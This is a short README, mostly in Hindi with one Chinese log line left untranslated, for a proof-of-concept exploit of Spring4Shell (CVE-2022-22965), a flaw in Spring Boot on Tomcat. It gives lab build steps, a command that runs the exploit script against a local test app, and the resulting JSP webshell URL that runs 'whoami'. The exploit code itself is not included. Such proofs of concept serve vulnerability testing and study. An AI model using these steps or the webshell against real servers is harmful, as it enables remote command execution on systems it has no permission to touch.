
Spring4Shell (CVE-2022-22965) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो कमजोर Apache Tomcat पर चल रहे Spring Boot अनुप्रयोगों में क्राफ्टेड HTTP अनुरोधों के माध्यम से एक JSP वेबशेल तैनात करता है।
भेद्यता का विवरण: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
POC का निर्माण: https://github.com/BobTheShoplifter/Spring4Shell-POC
JDK 11.0.14, Spring Boot 2.6.5, और Apache Tomcat 9.0.60 के साथ परीक्षण किया गया
mvn clean package चलाएँdemo-0.0.1-SNAPSHOT.war का नाम बदलकर spring-poc.war करें और इस .war फ़ाइल को Tomcat की webapps निर्देशिका में कॉपी करेंpython exp.py --url http://localhost:8080/spring-poc/greeting चलाएँ
漏洞存在,shell地址为:http://localhost:8080/spring-poc/tomcatwar.jsp?pwd=j&cmd=whoami लॉग किया जाएगा।tomcatwar.jsp फ़ाइल लिखी हुई दिखनी चाहिए। इस निर्देशिका को exp.py में संशोधन करके बदला जा सकता है।

